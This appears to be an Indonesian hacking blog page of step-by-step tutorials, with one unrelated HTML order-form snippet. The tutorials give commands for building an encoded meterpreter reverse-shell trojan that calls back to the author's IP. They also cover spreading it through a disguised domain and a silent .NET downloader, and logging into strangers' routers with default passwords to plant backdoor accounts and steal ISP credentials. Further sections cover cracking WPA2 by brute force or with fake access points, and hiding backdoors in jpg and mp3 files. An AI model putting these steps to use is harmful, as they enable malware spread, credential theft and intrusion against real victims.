Exploit windows dengan metode .net inzector downloader

OK
tutor kali ini akan memperagakan adegan exploit pada ip public

dengan tehnik manipulasi downloader

ok
disni kita kan bekerja menggunakan 2 os untuk membuat exploit yang jitu

backtrack 5r3
dan windows 7

disini ip public saya (attacker) = 125.164.216.221
dan korban (victim) = 180.247.106.236

untuk melihat ip public bisa cek di

http://www.whatismyip.com/

langkah pertama kita buka dulu


buat dulu listener dari terminal backtrack dengan menggunakan perintah

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 LHOST=125.164.216.221 LPORT=4444 >trojanzboy.exe

ganti ip merah dengan ip public kalian

setelah itu terciptalah sebuah backdoor yang saya beri nama trojanzboy.exe pada directory root

setelah itu pindah hasil backdoor tadi pada directory /var/www

setelah di pindah
sekarang masuk router dan forward ip local kalian pada router
masukkan port 4444 dan 80 untuk listener dan apache 
disini ip local saya 192.168.1.12

setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start

kalau sudah selesai saatnya membungkus ip public saatnya membuat domain pada http://freedns.afraid.org/ 
kalau belum punya id daftarkan dulu ya

setelah daftar langsung masuk subdomain klik add

setelah selesai save

setelah tersimpan saatnya buka terminal lalu masuk metasploit

msfconsole

dan masukkan exploit multi/handler dan exploit

sekarang copy file backdoor yang telah di buat ada pada /var/www pada OS windows


download tool inzectornya dulu untuk windows --> https://dl.dropboxusercontent.com/s/czq2oph5kxcofpg/Inzector%28By%20trojanzboy.blogspot.com%29.rar?token_hash=AAG_TkjtdSNqmNkzXE_ca1PCNmNv2TJl1qx0mffTPLqXRg&dl=1


lalu ekstrak hasil download
ok buka program inzector lalu klik load dan masukkan program calculator / program .net kalian disini saya contohkan calculator saja lalu open

setelah itu klik
program >> klik 2x main

dan pada menu downloader masukkan alamat domain yang kita buat pada http://freedns.afraid.org/ disini domain saya http://narutoupdate.strangled.net/ dan INGAT nama backdoor yang telah kita copy pada folder /var/www disini backdoor nya saya namakan trojanzboy.exe maka hasil urlnya adalah

http://narutoupdate.strangled.net/trojanzboy.exe 

 dan isi downloader path = hasil downloadnya saya taruh di system32 dan saya beri nama test dan klik inject

dan tentukan letak hasil output

 disini saya beri nama trojanzboycrypted.exe dan saya taruh di desktop

maka file ini siap disebarin ke public
kita scan dengan virustotal

dan jika file trojanzboycrypted.exe ini di jalankan maka program akan mendownload file dari http://narutoupdate.strangled.net/trojanzboy.exe  secara silent otomatis   dan meletakkan exploit pada \windows\system32\test.exe dan program .net calculator pun ikut jalan

dan balik ke backtrack os dan apa yang terjadi sesi meterpreter pun exploit sukses terbuka juga . .  .

program calculator bisa diganti sesuai selera
jangan lupa hasil inject cryptednya di kasih icon biar :mantap

untuk ganti icon bisa gunakan tool icon changer full version-->  https://dl.dropboxusercontent.com/s/ik4h8fhthh471b4/IconChangerfull.rar?token_hash=AAEpLMNx80gcTZ1TZy87yo8PJdTV7uSDWJtE6alXftX8yw&dl=1

Read More

Hack modem dan hack password speedy lalu pasang multiuser

Langsung aja ne sesuai judul

Yuk mulai..

Pertama-tama Download dulu angry ip scanner --> https://dl.dropboxusercontent.com/s/rb5s80o8y7dx0jq/ipscan221.rar?token_hash=AAE6ZOhyAnpRMQWT53yJ0D9szMbxJ5Y5gWahGAVV52Rl-g&dl=1

cari tahu IP Public speedy yang sedang anda pakai, caranya banyak, salah satunya masuk pada
http://www.whatismyip.com/

ip public saya 180.247.12.233

yuk kita lakukan scanning menggunakan Angry IP Scanner yang sudah kita download tadi.coba scan dari 1-255
jadinya 180.247.12.1-255

hmm . . . ane coba hack modem dari IP 180.247.12.149

coba buka browser dan masukkan IP korban pada adrress bar lalu muncul halaman login
masukkan password default
kalau beruntung passwornya default yaitu

user = user  &   pass = user    atau

user = admin   &  pass = admin

kalau gagal login cari korban lain yang masih cupu alias masih menggunakan default password

kalau pengen maju terus semangat 45 coba crack password yang sudah di ganti password defaultnya dengan menggunakan tool hydra atau medusa

disini korban saya masih menggunakan password default

dan saya berhasil masuk modem korban

disini korban menggunakan modem tplink lau rubah password adminya pada maintenace > administrator
masukkan password admin

Setelah masuk coba buka program putty kalau belum punya bisa download Putty
 https://dl.dropboxusercontent.com/s/4vyqaltx6llsw3y/putty%20and%20winSCP.rar?token_hash=AAF5WnBR28YrIDTFAwkgMO-_I2aodyVE5qfgj0sByX0AYw&dl=1
 buka putty lalu masukkan ip public korban tadi dan ubah mode menjadi telnet

 kalau sudah masuk telnet coba masukkan user dan password modem yang telah di rubah tadi {admin}

sekarang kita membuat akun backdoor multiuser agar kita dapat masuk ke modem korban sewaktu-waktu jika password default modem telah dirubah korban

ketikkan perintah

sys multiuser trojanzboy 1234567890

ket
trojanzboy       = user ( bisa diganti sesuai keinginan kalian)
1234567890   = password ( bisa diganti sesuai keinginan kalian)

dan mode telah diset 1

setelah selasai tugas kita selanjutnya mencari akun speedy korban
ketikkan perintah

show all

maka keterangan lengkap mengenai modem tertera sekarang cari ppp username dan ppp password pada modem

dan ketemu sekarang coba kalian login ke akun speedy pada alamat http://telkomspeedy.com/info-pemakaian-speedy

dan masukkan username&password yang kalian temukan pada pppusername&password modem

dan sukses bro loginnya

Read More

Hack wpa/wpa2 tanpa wpa handshake (bruteforce) dengan airlin

tutor kali ini akan membahas cara hack password wpa/wpa2 pada area hospot yang terkunci security wpa2

dengan tool airlin kita bisa bruteforce security wifi tanpa wpa handshake

langsung saja

download toolnya --> https://dl.dropboxusercontent.com/s/1tzd6tli6tj79dl/airlin-1-0-1.rar?token_hash=AAF6R-pzhL9prTTWQnR4xmvb9UhhNImeL49K62F40KOXvw&dl=1

taruh hasil download pada desktop lalu ekstrak dengan perintah

unrar x /root/Desktop/airlin-1-0-1.rar

setelah itu masuk folder airlin

cd Desktop/airlin-1-0-1
chmod 777 airlin.sh
mv airlin.sh /usr/bin/airlin.sh

setelah ailin dipindah folder ke /usr/bin lalu keluar dan buka terminal lagi
dan jalankan program airlin.sh



pilih interface kalian disini saya menggunakan wlan0

 Lalu cari korban wifi yang terproteksi wpa/wpa2
aktifkan airmon-ng dan scan dan scan dengan airodump-ng dengan membuka tab baru dengan menekan ctrl + shift + t

disini korban testing saya TrojanzBoy@wifi yang di proteksi wpa2

lalu copy paste essid wifi tersebut

lalu pilih wordlist kalian
disini wordlist saya ada pada /root/Desktop/trojanzboy.txt

lalu  isi kan delay nya
jangan terlalu cepat delaynya itu berakibat airlin gak bisa membruteforce dengan akurat

disini saya memilih delay 25

ok tunggu hingga proses brute selesai

dan password pun di temukan

Read More

Membuat Form Pemesanan Produk

<div style="border: solid 1px #000000;"><form action="http://www.SnapHost.com/captcha/send.aspx" id="ContactUsCaptchaWebForm" method="post" onsubmit="return ValidateForm(this);"> <input name="skip_WhereToSend" type="hidden" value="Email Anda" /> <input name="skip_SnapHostID" type="hidden" value="BM833MKCXEXQ" />
<input name="skip_WhereToReturn" type="hidden" value="url halaman Konfirmasi" /> <input name="skip_Subject" type="hidden" value="Contact Form" /> <input name="skip_ShowUsersIp" type="hidden" value="1" /> <input name="skip_SendCopyToUser" type="hidden" value="1" /> <script type="text/javascript"> function ValidateForm(frm) { if (frm.Nama.value == "") {alert('Nama harus di isi.');frm.Nama.focus();return false;} if (frm.Dari.value == "") {alert('Alamat email harus di isi.');frm.Dari.focus();return false;} if (frm.Dari.value.indexOf("@") < 1 || frm.Dari.value.indexOf(".") < 1) {alert('Tolong masukan alamat email yang benar.');frm.Dari.focus();return false;} if (frm.Pesan.value == "") {alert('Silahkan kirimkan komentar atau pertanyaan.');frm.Pesan.focus();return false;} if (frm.skip_CaptchaCode.value == "") {alert('Masukan kode di samping.');frm.skip_CaptchaCode.focus();return false;} return true; } function ReloadCaptchaImage(captchaImageId) { var obj = document.getElementById(captchaImageId); var src = obj.src; var date = new Date(); var pos = src.indexOf('&rad='); if (pos >= 0) { src = src.substr(0, pos); } obj.src = src + '&rad=' + date.getTime(); return false; } </script> <br /> <table border="0" cellpadding="5" cellspacing="0" style="width: 600px;"><tbody> 

<tr> <td><b>Nama Produk :</b></td> <td><input maxlength="60" name="Nama" style="width: 350px;" type="text" /></td> </tr>

<tr> <td><b>Nama Anda :</b></td> <td><input maxlength="43" name="NomorTelepon" style="width: 350px;" type="text" /></td> </tr> 

<tr> <td><b>Nomor HP :</b></td> <td><input maxlength="43" name="NomorTelepon" style="width: 350px;" type="text" /></td> </tr> 

<tr> <td><b>Email :</b></td> <td><input maxlength="60" name="Dari" style="width: 350px;" type="text" /></td> </tr>

<tr> <td><b>Pesan :</b></td> <td><textarea cols="40" name="Pesan" rows="7" style="width: 350px;"></textarea></td> </tr> <tr> <td align="center" colspan="2"><table border="0" cellpadding="0" cellspacing="0"><tbody> <tr><td colspan="2" style="padding-bottom: 18px;"><a href="http://www.snaphost.com/" rel="nofollow" style="color: #000099; font-family: Verdana, Arial, Helvetica; font-size: 11px; text-decoration: none;" target="_blank"> Kontak form ini dilindungi dari SPAM by : <span style="text-decoration: underline;">SnapHost.com</span></a></td></tr> <tr valign="top"><td><i>Masukan kode berikut*.</i> <input maxlength="6" name="skip_CaptchaCode" style="width: 80px;" type="text" /></td><td><a href="http://www.snaphost.com/" rel="nofollow" target="_blank"><img alt="Web Form Code" src="http://www.SnapHost.com/captcha/CaptchaImage.aspx?id=BM833MKCXEXQ&amp;ImgType=2" id="CaptchaImage" style="margin-left: 20px;" title="Anti-spam web forms" /></a></td></tr> </tbody></table> * Harus Di Isi. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <input name="skip_Submit" type="submit" value="Kirim" /></td></tr> </tbody></table> </form></div>

Read More

Membuat access point palsu dengan wifihoney untuk mendapatkan wpa handshake

oke langsung saja yapz  .  .
buka terminal dan kita scanning wifi yang akan di bajak aktifkan airmon-ng
dengan menggunakan perintah

airmon-ng start wlan0

 ganti wlan0 dengan interface kalian

setelah mode monitor aktik saatnya scanning korban

airodump-ng mon0

target wifi dengan security wpa2 dengan essid =  trojanzboy@wifi channel = 3




setelah selesai menentukan korban

sekarang buka menu backtrack > expoitation tools > wireless exploitation tools > wlan exploitation > wifihoney

lalu masukkan perintah ./wifi_honey.sh <essid> <channel> <interface>

./wifi_honey.sh TrojanzBoy@wifi 3 wlan0

maka terciptalah wifi-wifi palsu

dan tunggu hingga korban connect ke salah satu wifi  dan memasukkan password
tunggu hingga dapat wpa handshake dari akses point yang aslinya

maka wpa handshake yang asli pun kita dapatkan

saatnya pengecrack kan hasil handshake

buka terminal baru masuk directory dengan perintah

 cd /pentest/wireless/wifi-honey

setelah itu cek hasil capture dengan perintah 

ls

setelah menentukan hasil cap sekarang buka masukkan perintah aircrack

aircrack-ng -w /root/Desktop/Trojanzboy.txt /pentest/wireless/wifi-honey/cap-01.cap

 /root/Desktop/Trojanzboy.txt adalah letak wordlist yang telah saya dibuat bisa di kreasikan se kreatif mungkin agar password terpecahkan
dan cari nomer yang ada handshake dari akses point asli

dan tunggu hasilnya

SUKSES bro . . !!!

Read More

Exploit windows dengan Syringe bypass av

disini saya akan mempraktekkan cara exploit windows dengan syringe inject
pada ip publik biar seru tidak lagi pada local area

ok

langsung saja ya download scriptya di --> https://dl.dropboxusercontent.com/s/stqllmoj3skep0t/syringe%28by%20Trojanzboy.blogspot.com%29.rar?token_hash=AAEP3DPIVH3dBc149VC27UelZCf93Vn6NLPoJtGtWEp-EA&dl=1

lalu ekstrak pada DESKTOP maka terdapat dua file
1. syringe.sh
2. syfile.tar

langsung saja buka terminal dan masuk ke desktop

jangan lupa chomod 777 ya pada file syringe.sh

setelah di chmod buka file syringe.sh dan rubah ip public kalian
ip public saya = 125.164.221.221
ip local saya = 192.168.1.36

cara lihat ip public bisa masuk http://www.whatismyip.com/

edit syringe.sh

setelah di setting saatnya beraksi

balik lagi ke terminal tadi lalu ketikkan perintah

./syringe.sh

dan tunggu hingga payload terbuka dan metasploit run automatic

nah exploit selesai saatnya memforward ip local kita
masuk ke modem router 192.168.1.1
masukkan password anda
kita setting pada router/modem di NAT

jangan lupa masukkan port 80 untuk apache
dan 4444 untuk payload listener

setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start


kalau sudah selesai saatnya membungkus ip public kita agar tidak telanjang biar korban tidak curiga dengan menggunakan http://freedns.afraid.org/

daftar setelah daftar langsung isi domain anda terserah buat pengecohan korban

setelah selesai save

dns punya saya narutoupdate.strangled.net

sekarang menggabungkan url dengan listener metasploit
disini saya namakan trojanzboy.exe

jadinya http://narutoupdate.strangled.net/trojanzboy.exe

dan saatnya menyebarkan link backdoor anda
tunggu hingga korban masuk dalam link anda dan mendownloadnya

dan session meterpreter pun terbuka

syringe av

Read More

Memanipulasi backdoor pada mp3,word jpg, dan ekstensi lainya

sesuai judul disini kita akan menyisipkan backdoor pada .doc.mp3.jpg dan ekstensi lainya
kita asumsikan netcat itu adalah backdoor/server kita

langsung aja ya download dulu programnya  https://dl.dropboxusercontent.com/s/ui3evmrbp0k8g7u/Backdooring%20exec.rar?token_hash=AAG9YwfV4mAZgKm5RssDM_lBiusBdsMVDpCK9u5iNAWnWw&dl=1


setelah di download buka programnya

1. browse your server --> masukkan server backdoor disini saya contohkan netcat sebagai backdoor saya
2. pada file ekstensi isi ekstensi terserah kalian yang suport executable  misalnya .jpg
3. browse file --> cari file gambar pada drive anda yamg berekstensi .jpg
4. browse icon kita bisa buat icon semenarik mungkin agar korban terkecoh caranya masuk pada web  http://www.prodraw.net/favicon/index.php dan upload gambar yang ingin dijadikan icon
lalu UPLOAD dan pilih resolusi dan generate

 dan download

5. setelah memilih icon saatnya pilih hasil output keluaran inject disini saya taruh di desktop saja dan mulai menginjectkan ke file .jpg

dan jika si testserverrcsC.jpg di buka maka netcat yang kita asumsikan sebagai backdoor pun juga ikut jalan

 dan kita test lagi dengan ekstensi .mp3

netcat kita asumsikan sama sebagai backdoor kita

dan rubah pada exstension dengan mp3 jangan lupa pada browse kita cari file mp3 kita dan simpan pada desktop

lalu mulai menginjectkan

 lalu terbentuklah file di desktop yang telah disisipkan netcat sebagai backoor kita

dan jika korban menjalankan mp3 yang telah kita sisipin backdoor maka
mp3 akan play dan si netcat juga jalan

 dan sekarang hasil output itu siap upload ke public . .

Read More